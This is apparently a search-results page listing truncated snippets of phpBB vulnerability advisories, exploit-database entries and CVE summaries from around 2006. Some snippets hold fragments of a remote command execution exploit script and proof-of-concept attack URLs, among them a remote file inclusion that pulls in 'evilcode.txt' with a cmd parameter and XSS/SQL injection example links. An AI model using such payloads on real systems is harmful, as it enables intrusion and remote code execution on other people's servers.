2176 matches found
PHPBB 2.0.20 persistent issues with avatars
PHPBB 2.0.20 multiple issues with avatars some problems persistently lie in the way it handles remote and uploaded avatars: a remote user can: 1 saturate the server with unuseful files, 'cause phpbb do not delete the previous one when you upload a new avatar 2 use PhpBB installations to launch...
FreeBSD : phpbb -- multiple vulnerabilities (28c9243a-72ed-11da-8c1d-000e0c2e438a)
Multiple vulnerabilities have been reported within phpbb. phpbb is proven vulnerable to : - script insertion, - bypassing of protetion mechanisms, - multiple cross site scripting vulnerabilities, - SQL injection, - arbitrary code execution %NASLMINLEVEL 70300 C Tenable Network Security, Inc. The...
phpBB 2.0.20 - AdminRestore DBdefault_lang Remote Command Execution
phpBB 2.0.20 - AdminRestore DBdefaultlang Remote Command Execution !/usr/bin/php -q -d shortopentag=on you need an admin sid, works regardless of magicquotesgpc settings\r\n"; echo "tested and working against a fresh PhpBB installation\r\n\r\n"; if $argc5 echo "Usage: php ".$argv0." host path sid...
[Kurdish Security # 7] Foing Remote File Include Vulnerability [PHPBB]
Kurdish Security Advisory Original Advisory : http://kurdishsecurity.blogspot.com/2006/05/kurdish-security-7-foing-remote-file.html Foing Remote File Include Vulnerability PHPBB : "Ey Tarih ya sana basarilar atfedecegiz ya da seni yasanmamis sayacagiz ." Abdullah Ocalan STOP THE MASSACRE IN THE...
phpBB <= 2.0.20 (Admin/Restore DB/default_lang) Remote Exploit
Exploit for unknown platform in category web applications ============================================================== phpBB you need an admin sid, works regardless of magicquotesgpc settings\r\n"; echo "tested and working against a fresh PhpBB installation\r\n\r\n"; if $argc5 echo "Usage: php...
phpBB <= 2.0.20 (Admin/Restore DB/default_lang) Remote Exploit
No description provided by source. !/usr/bin/php -q -d shortopentag=on ? echo "PhpBB = v2.0.20 "Admin/Restore Database/defaultlang remote commands execution\r\n"; echo "by rgod [email protected]\r\n"; echo "site: http://retrogod.altervista.org\r\n"; echo "- you need an admin sid, works regardles...
phpBB 2.0.20 - Admin/Restore DB/default_lang Remote Command Execution
!/usr/bin/php -q -d shortopentag=on you need an admin sid, works regardless of magicquotesgpc settings\r\n"; echo "tested and working against a fresh PhpBB installation\r\n\r\n"; if $argc5 echo "Usage: php ".$argv0." host path sid cmd OPTIONS\r\n"; echo "host: target server ip/hostname\r\n"; echo...
phpBB 2.0.20 - Unauthorized HTTP Proxy
phpBB 2.0.20 - Unauthorized HTTP Proxy source: https://www.securityfocus.com/bid/17965/info phpBB is prone to a vulnerability that could permit the application to become an unauthorized HTTP proxy. An attacker can exploit this issue to manipulate phpBB into becoming an HTTP proxy...
phpBB 2.0.20 - Unauthorized HTTP Proxy
source: https://www.securityfocus.com/bid/17965/info phpBB is prone to a vulnerability that could permit the application to become an unauthorized HTTP proxy. An attacker can exploit this issue to manipulate phpBB into becoming an HTTP proxy...
phpBB "charts.php" XSS and SQL-Injection
// phpBB "charts.php" hack XSS and SQL-Injection // ----------------------------------------------------------------- Advisory by: LoK-Crew - Exploit: http://www.example.com/charts.php?action=vote&rate=1&id=XSS http://www.example.com/charts.php?action=vote&rate=1&id=SQL - Googledork:...
Foing 0.7.0 - 'phpBB' Remote File Inclusion
Kurdish Security Advisory Original Advisory : http://kurdishsecurity.blogspot.com/2006/05/kurdish-security-7-foing-remote-file.html Foing Remote File Include Vulnerability PHPBB : "Ey Tarih ya sana basarilar atfedecegiz ya da seni yasanmamis sayacagiz ." Abdullah Ocalan STOP THE MASSACRE IN THE...
Foing <= 0.7.0 (phpBB) Remote File Inclusion Vulnerability
No description provided by source. Kurdish Security Advisory Original Advisory : http://kurdishsecurity.blogspot.com/2006/05/kurdish-security-7-foing-remote-file.html Foing Remote File Include Vulnerability PHPBB : "Ey Tarih ya sana basarilar atfedecegiz ya da seni yasanmamis sayacagiz ." Abdulla...
Foing <= 0.7.0 (phpBB) Remote File Inclusion Vulnerability
Exploit for unknown platform in category web applications ========================================================== Foing Proof Of Concept : http://www.r0xed.com/foingpath/index.php?phpbbrootpath=http://evilcode.txt?&cmd...
Foing 0.7.0 - phpBB Remote File Inclusion
Foing 0.7.0 - phpBB Remote File Inclusion Kurdish Security Advisory Original Advisory : http://kurdishsecurity.blogspot.com/2006/05/kurdish-security-7-foing-remote-file.html Foing Remote File Include Vulnerability PHPBB : "Ey Tarih ya sana basarilar atfedecegiz ya da seni yasanmamis sayacagiz ."...
pafileDB <= 2.0.1 (mxBB/phpBB) Remote File Inclusion Vulnerability
Exploit for unknown platform in category web applications ================================================================== pafileDB = 2.0.1 mxBB/phpBB Remote File Inclusion Vulnerability ================================================================== PafileDB Remote File InclusionphpBB Conta...
CVE-2006-2283
Multiple PHP remote file inclusion vulnerabilities in SpiffyJr phpRaid 2.9.5 through 3.0.b3 allow remote attackers to execute arbitrary PHP code via a URL in the phpbbrootpath parameter in 1 auth.php and 2 authphpbb when the phpBB portal is enabled, and via a URL in the smfrootpath parameter in 3...
Remote file inclusion
Multiple PHP remote file inclusion vulnerabilities in SpiffyJr phpRaid 2.9.5 through 3.0.b3 allow remote attackers to execute arbitrary PHP code via a URL in the phpbbrootpath parameter in 1 auth.php and 2 authphpbb when the phpBB portal is enabled, and via a URL in the smfrootpath parameter in 3...
CVE-2006-2283
CVE-2006-2283 affects SpiffyJr phpRaid versions 2.9.5 to 3.0.b3, enabling remote PHP code execution via remote file inclusion. Exploitation vectors involve crafted URLs in phpbb_root_path (auth.php/auth_phpbb with phpBB portal enabled) and smf_root_path (auth.php/auth_SMF with SMF portal enabled)...
CVE-2006-2283
Multiple PHP remote file inclusion vulnerabilities in SpiffyJr phpRaid 2.9.5 through 3.0.b3 allow remote attackers to execute arbitrary PHP code via a URL in the phpbbrootpath parameter in 1 auth.php and 2 authphpbb when the phpBB portal is enabled, and via a URL in the smfrootpath parameter in 3...
CVE-2006-2245
Summary of CVE-2006-2245 (CVE List: CVE-2006-2245) : Affected software is the Auction mod for phpBB (Auction mod 1.3m). The vulnerability resides in the file auction/auction_common.php, enabling a PHP remote file inclusion when an attacker supplies a URL in the phpbb_root_path parameter. This all...